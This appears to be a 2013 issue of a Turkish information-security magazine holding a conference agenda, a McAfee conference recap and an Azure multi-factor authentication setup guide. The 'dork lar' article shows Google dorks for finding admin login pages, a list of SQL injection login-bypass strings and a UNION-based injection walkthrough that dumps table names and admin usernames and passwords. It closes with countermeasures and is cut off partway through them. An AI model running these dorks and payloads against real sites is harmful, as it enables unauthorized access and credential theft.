2013 McAFEE FOCUS 13 GÜVENLİK KONFERANSININ ARDINDAN WINDOWS AZURE MULTI-FACTOR AUTHENTICATION DORK LAR McAFEE ADVANCED THREAT DEFENSE TÜRKİYE GÜVENLİK SEKTÖRÜNE GLOBAL BİR BAKIŞ DİSK VERİ DEPOLAMA SİSTEMLERİ (DEVAM): DİSK PERFORMANS HESAPLAMALARI: SOSYAL MEDYA PAYLAŞIMLARI SEBEBİYLE HUKUKİ SORUMLULUK OBSERVE IT /SİSTEMİNİZDEKİ GÜVENLİK KAMERA SİSTEMİ
26 Kasım 2013 Salı Point Hotel Barbaros Web: http://www.nebulabilisim.com.tr/bs13 Kayıt: http://beyazsapka13.eventbrite.com SAAT KONU KONUŞMACI UNVAN ŞİRKET 8:00 Kayıt&Kahvaltı 9:00 Açılış Konuşması Serkan Akcan Bilgi Güvenliği Danışmanı/Yönetici Ortak Nebula Bilişim 9:15 Bulut Bilişim ve Yasal Düzenlemeler Leyla Keser Berber Bilgi Üniversitesi Enstitü Direktörü İstanbul Bilgi Üniversitesi 9:40 Microsoft ve Bulut Bilişim Güvenliği Mehmet Üner Sunucu ve Yazılım Araçları İş Grubu Yöneticisi Microsoft 10:00 ISO 27001 Bilgi Güvenliği ve 22301 İş Sürekliliği Yönetimi Sistemi Ali Dinçkan Kıdemli Danışman/Yönetici Ortak BTYÖN 10:25 Veeam ile Sanal Ortamda İş Sürekliliği Murat Açıncı Kıdemli Sistem Mühendisi Veeam 10:45 Kahve Molası 11:10 McAfee Security Connected İlkem Özar Ülke Müdürü McAfee 11:35 Avecto Yetki Yönetimi Richard Midgley Kanal Müdürü Avecto Caner Dağlı Bilgi Güvenliği Uzmanı Nebula Bilişim 11:55 Titus Veri Sınıflandırma ve Bilgi Güvenliği Cem Uçtum Direktör Detech 12:15 ObserveIT, Sunucunuzdaki Güvenlik Kamerası Arik Kasha EMEA Satış Direktörü ObserveIT Ozan Özkara Teknoloji Direktörü Komtera 12:35 Öğle Yemeği 14:00 E-Fatura, E-Defter ve Elektronik Ödeme Sistemleri ile İlgili Yasal Gelişmeler Elif Kavuşturan Bilgi Üniversitesi Enstitü Uzmanı/Avukat - BTS&Partners İstanbul Bilgi Üniversitesi 14:25 Hardware Security Module (HSM) Uygulamaları Okan Erözden Bölge Satış Müdürü SafeNet 14:45 Yeni Yatırımlar, Yeni Nesil McAfee Çözümleri Serkan Kırmızıgül Satış Mühendisi McAfee 15:10 Skybox Network Security Ozan Özkara Teknoloji Direktörü Komtera 15:30 Kahve Molası 16:00 Nebula Bilgi Güvenliği Yönetim Hizmeti Erkan Şen Teknik Müdür/Yönetici Ortak Nebula Bilişim 16:25 Kale Holding Başarı Hikayesi Yusuf Aydın Ağ ve Güvenliği Yöneticisi Kale Holding 16:45 BT Güvenliğinin Dönüşümü Ramazan Yavuz Kıdemli Araştırma Analisti IDC 17:05 Hediye Çekilişi ve Kapanış SPONSORLAR Konferans hakkında güncel bilgileri öğrenmek, konferans sunumlarında soru-cevap sistemine dahil olmak ve hediye çekilişlerinden yararlanmak için lütfen Nebula Bilişim'in Facebook ve Twitter hesaplarını takip edin. Twitter: @nebulabilisim Twitter Hashtag: #BeyazSapka13 Facebook: http://www.facebook.com/nebulabilisim
Değerli abonemiz, İçindekiler 04>> McAfee Focus 13 Güvenlik Konferansının Ardından Serkan Akcan 06>> Windows Azure Multi-Factor Authentication Önder Değer 10>> dork lar İrfan Kotman 12>> McAfee Advanced Threat Defense Serkan Kırmızıgül 16>> Türkiye Güvenlik Sektörüne Global Bir Bakış Ramazan Yavuz, Yeşim Araç 18>> Disk Veri Depolama Sistemleri (devam): Disk Performans Hesaplamaları: Tarkan Çiçek 20>> Sosyal Medya Paylaşımları Sebebiyle Hukuki Sorumluluk Av. Mehmet Bedii Kaya 22>> Observe IT /Sisteminizdeki Güvenlik Kamera Sistemi İrfan Kotman Beyaz Şapka için yeni bir dönem başlıyor! B eyaz Şapka projesi üç ayda bir olmak üzere yılda toplam dört sayı dergi çıkartıyor ve ücretsiz olarak yaklaşık 1500 kişiye dağıtılıyor. Önceki sayılarımızda Beyaz Şapka dergisinin artık tek başına yeterli olmadığını söyleyerek ipucu vermiştik ve son sayımızda güzel bir sürprize hazırlandığımızdan söz etmiştik. Çalışmalarımız ilk meyvesini verdi. Artık Beyaz Şapka markasının dergiden sonra ikinci bir ürünü var: Beyaz Şapka Bilgi Güvenliği Konferansı. Beyaz Şapka markası altında bir bilgi güvenliği konferansı üretmek çok uzun zamandır aklımızda vardı. Konferansın hayal ettiğimiz bir felsefesi, amacı ve içeriği de vardı. Ancak 2013 yılı başına kadar istediğimiz içerikte bir konferans üretmek için şartlar olgunlaşmamıştı. Beyaz Şapka dergisinin Şubat ayı sayısı itibarı ile şartların olgunlaştığını görüp konferansa aktif katılım gösterecek kurumları belirleyerek temasa geçtik ve tamamından olumlu yanıt aldık. Desteklerinden dolayı Avecto, Btyön, Komtera, Microsoft, McAfee, ObserveIT, SafeNet, Skybox, Titus, Veeam şirketlerine ve İstanbul Bilgi Üniversitesi Bilişim ve Teknoloji Hukuku Enstitüsüne teşekkür ederiz. Beyaz Şapka Bilgi Güvenliği Konferansı 26 Kasım 2013 Salı günü Point Hotel Barbaros da yapılacak ve düzenli olarak tekrar edilecek. Beyaz Şapka daki değişim konferanstan ibaret de değil ancak konferansı ve arkasındaki detayları öğrenmek için açılış konuşmamızı izlemeniz gerekecek. Konferansa katılamayanlar Beyaz Şapka konferansının ve arkasındaki işbirliğinin detaylarını Şubat ayı sayımızda okuyabilecekler. Konferansa katılım son kullanıcı kurumlara ücretsiz olacak. Katılımcı kalitesini belirli bir seviyenin üzerinde tutmak ve kapasiteyi optimum kullanmak için katılım başvuruları detaylıca incelenecek ve öncelik hedeflenen profile sahip kurumların çalışanlarına öncelik verilecek. Nebula Bilişim in bakım ve destek sözleşmeli müşterileri için özel bir notumuz var. Siz her zaman çok özelsiniz! Eylül ayında sizin için bir pozitif ayrımcılık programı başlattık. Sizlere özel promosyonlar, özel konferanslara katılım davetiyeleri, sektörel özel toplantılar ve ücretsiz ek hizmetler gibi birçok avantaja sahip olacaksınız. Beyaz Şapka Bilgi Güvenliği Konferansına da sizlerin öncelikli kayıt hakkınız bulunuyor. Detaylı bilgi tüm bakım ve destek sözleşmeli müşterilerimize iletildi. Konu ile ilgili mesajlarımızı almadığınızı düşünüyorsanız lütfen bizimle temasa geçin. Eğer Beyaz Şapka Bilgi Güvenliği Konferansını ilk defa duyuyorsanız Nebula Bilişim i sosyal medya kanallarından takip etmiyorsunuz demektir. Konferans çalışmalarımız Ekim ayı ortası itibarı ile Facebook ve Twitter hesaplarımızdan duyuruldu. Konferans süresince Facebook ve Twitter hesaplarımız yoğun olarak kullanılacak ve çeşitli sürprizlerimiz için altyapı oluşturacak. Lütfen bizi sosyal medya araçlarımızdan takip edin. www.nebulabilisim.com.tr www.facebook.com/nebulabilisim www.twitter.com/nebulabilisim Güvenli Günler! Beyaz Şapka Ekibi Kasım 2013 beyaz şapka 3
Serkan AKCAN serkan.akcan@nebulabilisim.com.tr McAfee Focus 13 Güvenlik Konferansının Ardından McAfee Focus konferans serisinin altıncısı yine ABD nin Las Vegas şehrinde gerçekleştirildi ve biz yine oradaydık. İşte size kısa bir özet! McAfee Focus konferans serisinin altıncısı Focus 13 her yıl olduğu gibi yine Las Vegas ta The Venetian Hotel de gerçekleştirildi. Her fırsatta Focus konferansından bahsetmeye çalışıyoruz ama hiç bilmeyenler için kısaca özetleyeyim. McAfee Focus bilgi güvenliği dünyası için tasarlanmış bir konferans. Konferansın iş ortakları ve son kullanıcılar için iki farklı bölümü bulunuyor. Her yıl ortalama dört bin kişinin katılımı ile gerçekleştiriliyor. Konferansta onlarca paralel oturum bulunuyor. Bu oturumlar ürün ve teknolojilerin derinlemesine teknik detayları, sektörlere özel sunumlar, ürünlerin yol haritaları, teknoloji ortaklarının entegre çözümleri, yeni yapılan yatırımların tanıtımı gibi geniş bir alanı kapsıyor. Konferans süresince McAfee yetkilileri ile bire bir toplantılar düzenlenebiliyor. Bu yıl da konferansa Nebula ve müşterileri olarak çıkarma yaptık. Focus konferansı Partner Summit adında iki günlük iş ortakları konferansı ile birleştirildi. İlk iki gün iş ortakları toplantısı yapıldı. Partner Summit bölümünün ilk günü eğitim ikinci günü ise sunumlar ile geçti. Sunumların bitmesi ile birlikte McAfee Focus 13 konferansı açılış resepsiyonu ile resmi olarak başladı ve iki gün sürdü. Konferans süresince 70 ten fazla sunum yapıldı. İlk gün onlarca paralel oturumun yanı sıra genel oturumlarda üst düzey McAfee yöneticileri sahne aldı. İlk günün akşamında konferans katılımcıları Hard Rock Hotel de Kid Rock konseri ile eğlendi. Konferansın ikinci gününde teknik sunumların yanı sıra konferansın onur konuğu olarak Amerika Birleşik Devletlerinin eski savunma bakanı Leon Panetta genel oturumda sahneye çıktı. Focus 13 konferansında verilmeye çalışılan mesajları 5 adımda anlatmaya çalışacağım. 1. Intel&McAfee işbirliği Bildiğiniz üzere Şubat 2011 de Intel McAfee yi satın aldı. Intel şirketi önümüzdeki on yıla güvenlik konusunun damga vuracağını öngördüğü için bu satın almayı yaptığını duyurdu. Çok hızlı biçimde McAfee yazılımları ile entegre çalışan silikon seviyesinde çözümler geliştirdi. Bu süreçte McAfee logosunun altına An Intel Company yazısı eklendi ancak bunun haricinde McAfee nin organizasyonuna hiçbir müdahalede bulunulmadı. Bugüne kadar 4 beyaz şapka Kasım 2013
McAfee tarafını da açık bir şekilde sahiplenmedikleri söylenebilir. Ancak Focus 13 de yaşanan değişimi tüm katılımcılar fark etti. Teknik sunumların içerisinde Intel in yeri önemli derecede arttı ve Intel in tüm üst düzey yöneticileri konferansta hazır bulundu. Önümüzdeki dönem Intel ve McAfee isimlerini çok daha sık yan yana göreceksiniz. 2. Yeni ürün: McAfee Advanced Threat Defense McAfee geçen Şubat ayında ValidEdge şirketini satın aldı ve merakla beklememize neden oldu. Satın alınan ürünün Ekim ayına kadar geliştirme çalışmaları devam etti ve Focus 13 konferansında lansmanı yapıldı. McAfee Advanced Threat Defense (ATD) sandbox tekniği ile gelişmiş tehdit analizi yaparak bilinmeyen ve APT niteliğinde olan atakları tespit etmeye çalışıyor. McAfee tarafından satın alınmasının ardından yapılan geliştirme çalışmaları ile ürün fark yaratmayı başarmış. Ürünü kısaca 3 adımda anlatabiliriz. A. Tespit (find) McAfee ATD klasik olarak kodun veya uygulamanın çalıştırılması yöntemini kullanıyor. Üstelik bunu yaparken McAfee yazılımlarının yönetim konsolu olan McAfee epolicy Orchestrator yazılımı ile entegre olarak potansiyel tehdidin hedefindeki bilgisayarın işletim sistemini ve uygulama listesini öğrenebiliyor ve ilgili testleri birebir aynı sistemlerde yapabiliyor. Klasik test yönetiminin haricinde statik ve dinamik analizler de yaparak tespit başarısını yükseltiyor. B. Durdurma (freeze) Atağı tespit etmek kadar önlemeyi de önemseyen McAfee ATD, McAfee Network IPS ve McAfee Web Gateway ürünleri ile tam entegre çalışıyor. Tespit edilen atağı anında engelleyebilen sistem, atağın kopyalarını da otomatik engellemeye tabi tutabiliyor. Diğer ürünlerle entegrasyon sayesinde atağa maruz kalan veya atağı gerçekleştiren sistemlerin karantinaya alınması da mümkün. C. Onarma (fix) Ürünün en çarpıcı özelliklerinden biri onarma özelliği. Atağın tespitiyle birlikte sisteme verilen zarar da net olarak tespit ediliyor. Atak nedeniyle hafızada çalıştırılan uygulamalar, registry kayıtlarındaki değişiklikler ve DLL gibi kritik dosyalardaki değişiklikler tespit ediliyor. Merkezi yönetim konsolundan tek bir tıklama ile tüm bilgisayarlarda atak nedeniyle hafızada çalışan uygulamalar durdurulabiliyor, registry kayıtları normale çevrilebiliyor, dosya ve dizinlerde düzenlemeler yapılabiliyor. 3. Yeni ürün: StoneSoft McAfee Mayıs ayında StoneSoft şirketini satın aldığını duyurdu. Ürünün yeni adı McAfee Next Generation Firewall Powered by StoneSoft. Ürün gelişmiş bir Next Generation Firewall olduğu için uzun uzadıya teknik özelliklerinden bahsetmeyeceğim. Ancak özellikle üzerinde durdukları konunun evasion dediğimiz Firewall ürünlerini atlama teknikleri olduğunu söyleyebilirim. Detayları öğrenmek ve test etmek için aşağıdaki web sayfasına göz atmanızı öneriyorum. http://evader.stonesoft.com/ 4. McAfee Security Connected McAfee uzun zaman önce entegre güvenlik felsefesini benimsedi ve bütün ürünlerini çeşitli seviyelerde birbiriyle konuşur hale getirdi. Bu entegrasyonlar logların korelasyona tabi tutulup basitleştirilmiş ve anlamlandırılmış çıktılara dönüşmesini sağladığı gibi operasyonel olarak işleri kolaylaştıran hızlı bilgiye ulaşma, önleme emri gönderme, detaylı analize gönderme ve riskli sistemlerin otomatik güvenlik denetimine tabi tutulması gibi saymakla bitmeyecek kadar çok amaçlı kullanılabiliyor. Bu esneklik son kullanıcıların işini son derece kolaylaştırıyor ve güvenlik başarımını yükseltiyor. Konferansın programına baktığımızda hemen hemen her sunumda bir entegrasyondan bahsedildiğini görebiliyoruz. Entegrasyon konusu McAfee de güçlenerek devam edecek. 5. McAfee Security Innovation Alliance McAfee bütün ürünlerini entegre hale getirmekle yetinmedi ve entegrasyonun teknik altyapısını diğer üreticilere açtı. Bir anlamda McAfee temel yönetim ürünlerini güvenlik pazarının middleware i gibi konumladı. Diğer güvenlik ürünü geliştiricileri McAfee Security Innovation Alliance (SIA) programına başvurarak gerekli anlaşmaları yapıyor ve teknik altyapıya erişim sağlıyor. SIA iş ortaklarının bazıları McAfee ile ortak satış süreci de yürütüyorlar. Focus konferansında SIA sisteminin ne kadar hızlı büyüdüğünü gördük ve ne kadar büyük ilgi gördüğüne şahit olduk. İş ortağı listesine baktığınızda konunun ne kadar ciddi bir boyuta ulaştığını görebilirsiniz: http://mcaf.ee/cowm0 Kısaca bahsetmek gerekirse SIA iş ortaklarının ürünleri ile antivirüs yönetim konsolunu yetki yönetim yazılımına, yama yönetim sistemine, lisans takip yazılımına veya güç yönetimi sistemine çevirmek mümkün. Tüm bunlar yönetim konsolu epolicy Orchestrator yazılımına basit bir paket yükleyerek kolayca yapılabiliyor. Focus konferansına SIA iş ortakları çeşitli seviyelerde sponsor olarak destek verdiler. Nebula olarak ilgimizi çeken birkaç üretici ile görüştük ve çözümlerini test etmeye başladık. Testlerimizin tamamlanmasının ardından bu çözümleri pazara sunacağız. McAfee Focus 14 Önümüzdeki yıl McAfee Focus 14 konferansı 27-29 Ekim tarihlerinde yine Las Vegas ta The Venetian Hotel de yapılacak. Konferans hakkında bilgi almak için web sitesini ziyaret edebilir veya bizimle temasa geçebilirsiniz. http://www.mcafeefocus.com Kasım 2013 beyaz şapka 5
Önder Değer onder.deger@bilgeadam.com Windows Azure Multi-Factor Authentication BT dünyasının en hızlı büyüyen Bulut Bilişim platformu olan Windows Azure, Windows Azure Multi-Factor Authentication (Çok Faktörlü Kimlik Doğrulama) ile kimlik doğrulama ve güvenlik işlemlerini bir üst seviyeye taşıyor. kullanarak kendi geliştirdikleri uygulamalar içerisinde kullanabilecekler. Multi-Factor Authentication güvenlik teknolojisi; katmanlı bir yapıdan oluşmaktadır. Birden fazla kimlik doğrulama metoduyla saldırganlar için önemli bir meydan okuma sunmaktadır. Bu metotlar aşağıdaki gibidir: Tipik parola Akıllı telefon gibi kolayca taklit edilemeyecek bir aygıt Biometric Son kullanıcılar ve kurumsal firmaların Bulut Bilişim platformlarında en çok merak ettiği konulardan biridir güvenlik. Windows Azure un güvenliği konusunda önemli bir katkı sağlayan Multi-factor (MFA) ya da two-factor (2FA) teknolojisi; birden fazla kimlik doğrulama yönetiminin birlikte kullanıldığı ve kullanıcı oturum açma işlemlerine ikinci bir katman daha ekleyerek güvenliği önemli derecede arttıran bir kimlik doğrulama yöntemidir. Windows Azure un coğrafi olarak dağıtılmış veri merkezleri, güvenlik ve güvenirlilik için ISO/IEC 27001:2001 gibi temel endüstri standartları ile uyumludur. Şimdi de kullanıcılar Multi-Factor Authentication teknolojisini ister Windows Azure Active Directory ile birlikte isterlerse şirket içi kaynaklarını güvenlik altına almak için Windows Azure Multi-Factor Authentication Server ile birlikte isterlerse SDK Bir saldırgan yukarıda saydığımız kimlik doğrulama metotlarından kullanıcı parolasına sahip olsa bile MFA için yetkilendirilmiş güvenilir bir cihaza sahip olmadığından kimlik doğrulamayı geçemeyecektir. Windows Azure Multi-Factor Authentication kullanıcıları aynı zamanda mobil uygulama, telefon veya kısa mesaj kullanarak kimliklerini doğrulayabilirler. Kimlik Doğrulama Seçenekleri Çoklu out-of-band yöntemleri ve tek kullanımlık parola seçeneği ile Windows Azure Multi-Factor Authentication kullanıcıların tercih ettikleri yöntem ile kimlik doğrulama işleminin başarısız olması durumunda yedekleme seçenekleri için esneklik sağlamaktadır. 1) Multi-Factor Authentication Uygulamaları, Windows Phone, Android ve IOS kullanıcılarının ücretsiz indirebilmeleri için Store lar da bulunmaktadır. Uygulama yüklendikten sonra ek güvenlik sağlamak için 2 farklı modda çalışabilir. 6 beyaz şapka Kasım 2013
a) Bildiri: Bu modda Windows Azure MFA, hesapları yetkisiz erişimlere karşı engeller ve hileli yapılan işlemleri durdurur. Bunu kullanıcının telefonuna bir bildirim mesajı göndererek yapmaktadır. Kullanıcı basitçe bildirimi görür ve bildiği bir erişim ise kimlik doğrulamayı onaylar. b) Tek kullanımlık parola: Bu modda, Windows Azure MFA uygulaması bir OATH parolası oluşturmak için kullanılabilir. Daha sonra oluşturulan bu parola, kimlik doğrulama esnasında kullanıcı adı ve parolası ile birlikte kullanılacaktır. 2) Otomatik Telefon Araması metodu ile sabit veya cep telefonu hattınıza otomatik bir arama gelmektedir. Kullanıcı sadece # tuşunu tuşlayarak kimlik doğrulama işlemini onaylamış olmaktadır. 3) Kısa Mesaj, Windows Azure MFA tarafından belirlenen cep telefonuna gönderilir. Metin mesajı tek kullanımlık şifre içermektedir. Kullanıcı bu tek kullanımlık parolayı kullanarak kimlik doğrulama işlemini tamamlar. SDK için şu anda sadece telefon araması ve kısa mesaj metotları kullanılabilmektedir. Dilerseniz Windows Azure Multi-Factor Authentication ın kullanımların alanlarını birlikte inceleyelim. Bulut ortamının güvenliği Windows Azure Active Directory kullanıcıları için Multi-Factor Authentication etkinleştirilerek kullanıcıların sonraki oturum açmaları esnasında ek doğrulama metodunu kurmaları istenmektedir. Multi-Factor Authentication ı Windows Azure, Office 365 ve Dynamics CRM Online gibi bulut ortamlarınızın güvenliğini artırmak için kullanabilirsiniz. Bununla birlikte Microsoft bulut platformu dışında kullandığınız diğer bulut bilişim platformlarını Windows Azure Active Directory ile entegre ettiyseniz, MFA için ek ayarlar yapmanıza gerek yoktur. Çok sayıda kullanıcı ve küresel ölçekte uygulamalar için kolayca etkinleştirilebilmektedir. Şirket içi kaynakların ve Active Directory güvenliği Windows Azure Multi-Factor Authentication Server kullanarak şirket içi kaynaklarınızı da Active Directory ortamınızı da MFA ile daha güvenli hale getirebilirsiniz. Windows Azure Multi-Factor Authentication yöneticilere Microsoft IIS web uygulamalarını IIS, RADIUS, LDAP ve Windows kimlik doğrulama metotlarını entegre ederek sunmaktadır. Windows Azure Multi-Factor Authentication Server ı indirmek için iki farklı yöntem bulunmaktadır. Bunlardan ilki Windows Azure portal alanında Multi-Factor Authenticaton alanına gelerek bir MFA oluşturmanız ve Manage butonuna tıklamanız. Açılan Management Portal ekranında Download bölümüne gelerek indirme işlemine başlayabilirsiniz. Bir diğer yöntem ise https://pfweb.phonefactor.net adresine bağlanmanız ve daha önceden PhoneFactor adresine kayıt ettirdiğiniz kullanıcı adınız ile oturum açmanız. Yine açılacak ekranda download bölümünden serverı indirebilirsiniz. Özel uygulamaların güvenliği Yazılım Geliştirme Seti (SDK), bulut hizmetlerinizle doğrudan tümleşiktir. Multi-Factor Authentication telefon çağrısı ve SMS ile doğrulama yöntemlerini uygulamanızın oturum açma veya işlem süreçlerine ekleyebilir ve uygulamanızın var olan kullanıcı veri taba- Kasım 2013 beyaz şapka 7
Önder Değer onder.deger@bilgeadam.com nından yararlanabilirsiniz. Şimdi de birlikte Windows Azure Multi-Factor Authentication ın yapılandırma işlemlerine birlikte bakalım. Active Authentication Sağlayıcısının Oluşturulması Windows Azure ortamınızda active authentication sağlayıcıyı oluşturabilmeniz için Windows Azure Portal bölümüne yetkili bir kullanıcı ile giriş yapmanız gerekmektedir. Giriş işlemini başarılı New butonuna bastığınızda karşınıza gelen ekranı aşağıdaki bilgiler doğrultusunda doldurabilirsiniz. a. Name Active Authentication sağlayıcınız için belirlemeniz gereken isim bölümü b. Usage Model Active Authentication sağlayıcınız için kullanım modeli a. Per Authentication Bu model satın alınan kimlik doğrulama başına ücretlendirmektedir. Bir uygulama içerisinde Windows Azure Active Authentication kullanımı gerektiren senaryolar için uygundur. b. Per Enabled User Bu model satın alınan her etkin kullanıcı başına ücretlendirilmektedir. Office 365 gibi senaryolar için uygundur. c. Directory Windows Azure sağlayıcınızı Windows Azure Active Directory servisiniz ile ilişkilendirmek istediğinizde belirlemeniz gereken bölümdür. bir şekilde geçtikten sonra ekranın sol bölümünde bulunan Active Directory bölümüne gelin ve burayı tıklayın. Create butonuna bir kez bastığınızda Active Authentication Provider oluşturulmaya başlanacak Successfully mesajı ile başarılı bir şekilde oluşturduğunuzu göreceksiniz. Windows Azure Multi-Factor Authentication için Açılan Active Directory penceresinde ekranın üst bölümünde bulunan Active Authentication Providers bölümünü seçin New butonuna tıklayın. hilecilik ayalarının yapılması Windows Azure Multi-Factor Authentication sağlayıcınızı oluşturduktan sonra Manage butonuna basarak Windows Azure Multi- Factor Authentication Management Portal sayfasını açın. 8 beyaz şapka Kasım 2013
Açılan sayfanın sol bölümünden Settings alanına tıklayın. Açılan Settings sayfasında da Fraud Alert bölümünden Allow users to submit Fraud Alerts bölümünü seçerek sahte girişler için alarm verilmesini sağlayabilirsiniz. Yine aynı pencerede sahte giriş yaptığını bildirdiğiniz kullanıcıları Block user when fraud is reported seçeneği çalışanının sahte girişim için bilgilendirileceği mesajı ile karşılaşacaksınız. Report Fraud butonu ile işlemi tamamlayabilirsiniz. Bloklanan tüm sahte girişimleride Windows Azure Multi-Factor Authentication Management Portal ekranından raporlayabilirsiniz. View a Report bölümünün altında Fraud Alert bölümüne tıklayın ve açılan pencerede raporlamak istediğiniz tarih aralığını belirtin. Dilerseniz özel ile bloklayabilirisiniz. Telefon ile gelen doğrulama metodunda ise güvenilmeyen kullanıcı girişlerini Create to report fraud during initial greeting kutucuğuna girdiğiniz numara ve # işaretini kullanarak raporlayabilirsiniz. Bu işlemleri gerçekleştirip Save butonuna bastıktan sonra raporlama ve bloklama işlemlerini kontrolünü yapabilirsiniz. Telefonunuzda bulunan Multi-Factor Authentication uygulamasına doğrulama bildirimi geldiğinde aşağıdaki gibi bir görünüm olacaktır. Cancel and Report Fraud butonuna basarsanız, kuruluşunuzun IT bir kullanıcı adı ya da telefon numarası belirtebilirsiniz. Run butonuna bastığınızda raporunuz hazırlanacaktır ve Export to CSV komutuyla da raporunuzu dışarıya çıkartabilirsiniz. Windows Azure Multi-Factor Authentication Management Portal sayfasından sadece hilecilik ayarlarını değil birçok farklı bölümün ayarlarına dokunabiliyorsunuz. İsterseniz kendiniz dilediğiniz kullanıcıları ya da telefon numaralarını bloklayabileceğiniz gibi dilediğiniz kullanıcılardan da bloku kaldırabilirsiniz. Telefon aramaları için dilediğiniz sesli mesajları ekleyebilir, bildirimler için e-mail adresleri tanımlayabilirsiniz. Makalemizin sonuna geldiğimiz bu bölümde Windows Azure Multi-Factor Authentication ile ilgili detaylı bilgilere http://www.windowsazure.com, http://msdn.microsoft.com, http://technet.microsoft.com adreslerinden de ulaşabilirsiniz. Kasım 2013 beyaz şapka 9
İrfan Kotman irfan.kotman@nebulabilisim.com.tr dork lar Bu sayımızda, geçen sayımızdaki Underground yazısı sırasında değindiğimiz dork ları detaylandıracağız ve dorklar kullanılarak tespit edilen sitelere elle yapılabilen birkaç birkaç basit SQL Injection atağı örneğinden bahsedeceğiz. SQL Injection Nedir? Kullanıcılar ya da uygulamalar tarafından Web sayfalarına yollanan isteklere SQL sorgu parçacıkları eklemek olarak tanımlanabilir. Birçok Web sayfası kullanıcılardan gelen istekleri alır ve veri tabanı üzerinde sorgular çalıştırır. SQL Injection sırasındaki girdiler ile SQL sorgularında hakkımız olmadığı halde belirli sonuçlara erişebilme şansını elde edebiliriz. Günümüzde Web sayfalarının yapılarının tasarımı sırasında güvenliğin ön plana tutulması ve Web tasarımı sırasında kullanılan yapıların değişmesi sebebi ile SQL açığına sahip site sayısı azalmıştır. Buna rağmen günümüzde de internet siteleri ya da forumlarda SQL Injection atağına maruz kalmış yada maruz kalması olası site örneklerini görebilmekteyiz. Arama Motoru Dorkları Bu sayımızdaki ilk SQL Injection atağı yapılacak site örneğimizi belirlemek için "inurl:login/admin.asp" dorkunu kullanıyoruz ve uyan siteleri belirliyoruz. Web sitelerine ait yönetici sayfalarını belirlenirken denediğimiz "inurl:login/admin.asp" dışında, "inurl:admin.asp", "inurl:administratorlogin.asp", "inurl:adminlogin.asp", "inurl:adminh o m e. a s p " "inurl:admin_login.asp" gibi bir çok kriter kullanma şansına sahibiz. "inurl:login/admin.asp" kullanarak belirlediğimiz Web sitesine yapılabilecek en temel SQL Injection atağı admin hesabı ile siteye erişilmeye çalışılmasıdır. Hala birçok sitenin yönetici hesabı girişlerinde olağan isim olarak kullanılan admin hesabı kullanılmaktadır. http://siteismi/login/admin.asp?id=admin 'or'1'='1 sorgusu ile yönetici olarak siteye bağlanılmasının denenmesi en kolay SQL Injection atağı olarak tanımlanabilir. Aynı sorgu kullanıcı adı ve şifre ekranı kullanılarak aşağıdaki gibi denenebilir. Kullanıcı Adı: Admin Şifre : 'or'1'='1 SQL girdisi olarak 'or'1'='1 dışında birçok sorgu örneği site üzerindeki yönetici hesabına erişim için kullanabilir. Aşağıda kullanabilecek girdi örneğini görebilirsiniz. ' or '1'='1, ' or 'x'='x, ' or 0=0 --, " or 0=0 --, or 0=0 --, or 0=0 #, " or 0=0 #, or 0=0 #, ' or 'x'='x, " or "x"="x, ' or 1=1--, " or 1=1--, or 1=1", or "a"="a, ') or ('a'='a, ") or ("a"="a) v.b. Peki bu girdiler ne anlama gelir? Klasik Web sayfalarındaki giriş yapılarını oluşturan kodları kandırmak için yukarıdaki girdiler kullanılabilir. Bu girdiler ile çalıştırılan sorgular sayesinde kullanıcı adı ve şifre girmeden siteye giriş sağlanabilir. Bir sitenin SELECT * FROM Members WHERE username = Username & "' AND Password = '" & Password & "'") '" & gibi bir koda sahip olduğunu düşünelim. Web sayfasına 'OR 1=1 (True) girdisi yollayarak şifrenin doğru olduğuna yada tam tersi bir istekle boş olduğuna inandırılarak giriş yapılabilir. Basit bir SQL Injection Atağı Bu sefer "inurl:newsdetail.php?id kullanılarak bir site belirliyoruz. Belirlediğimiz sitenin SQL ataklarında uygun olup olmadığı basit yöntemler ile tespit edilebilir. Bunun için tarayıcı üzerinden sitedeki bir id ye ( ) girdisi yolluyoruz. http://siteadı/newsdetail.php?id=x your MySQL server version for the right syntax to use near '\'' at line 1 şeklinde bir hata mesajının veri tabanından geri döndüğü görüyoruz. 10 beyaz şapka Kasım 2013
Bu hata mesajı veri tabanına erişimin şansımız olduğunu anlamı taşımaktadır. Bu sefer sitedeki açık olabilecek kolonları belirlemek için tarayıcımıza aşağıdaki girdiyi yazıyoruz. http://siteadı/newsdetail.php?id=x union+all+select+1,2,3,4,5,6,7,8,9 -- kullanılarak, bu denemeleri otomatik olarak gerçekleştirebilmekte ve açıklar üzerinden bilgi elde edilebilmektedir. Örnek olarak Aşağıdaki araç yardımı ile girilen komut yardımı ile SQL üzerindeki kullanıcı tablolarını listeleme şansınız olabilmektedir. Yolladığımız girdi sayesinde açık olabilecek kolonları belirliyoruz. Açık olabilecek kolonlar içinden 8 numaralı kolonu seçerek, http://siteadı/newsdetail.php?id=x union all select 1,2,3,4,5,6,7,table_name,9 from information_schema.tables Değerini tarayıcımıza giriyoruz. Bu girdi ile veri tabanının sürümünü olan 5.0.77 erişebildiğimizi görebilmekteyiz. Bu sefer işi bir adım öteye taşıyoruz. http://siteadı/newsdetail.php?id=x union+all+select+1,2,3,4,5,6,7, group_concat(table_name),9+from+information_schema.tables+where +table_schema=database() Bu girdi sayesinde siteye ait yönetici hesaplarının bulunduğu tbladmin isimli tablo olduğunu tespit ediyoruz. Yönetici hesaplarının bulunduğu tablo belirlendikten sonra, http://siteadı/newsdetail.php?id=x union all select 1,2,3,4,5,6,7,concat(username,0x3a,password),9 tbladmin gibi bir girdi ile yönetici tablosuna bulunan bir hesabın kullanıcı adı ve şifresini belirleme şansına sahip olabilmekteyiz. Bu gibi bir çok girdi ile sadece tarayıcı kullanarak bir çok SQL Injection denemesi yapılabilmektedir. Bunun yanında birçok araç SQL Injection a Karşı Alınabilecek Güvenlik Önlemleri Web Sunucular ile veri tabanları birbirinden ayrılmalı ve web sunucu üzerinden veri tabanına sunucusuna kontrolsüz erişim engellenmelidir. Site üzerine kullanıcılar tarafından yollanan girdilerde SQL sorgularında kullanılan özel karakterler filtrelenmeli, gerektiği takdirde girdilerdeki bazı karakterler kaldırılmalıdır. Veri tabanı sunucusu üzerinde servisleri çalıştırmak için kullanılan hesaplar ve veri tabanı sunucusu üzerinde bulunan kullanıcı hesaplarının yetkileri düzenlenmeli ve gereksiz yetkiler kaldırılmalıdır. Bünyeniz dâhilindeki Web sunucularınız, Web Zafiyeti Denetleme Araçları ile düzenli olarak denetlenmeli ve raporlanmalıdır. Site bileşenlerindeki her değişiklik sonrası bu denetim tekrar edilmelidir. Web sunucularınız önünde mümkün ise WAF (Web Application Firewall) konumlandırmalıdır. SQL sunucularınız veri tabanı 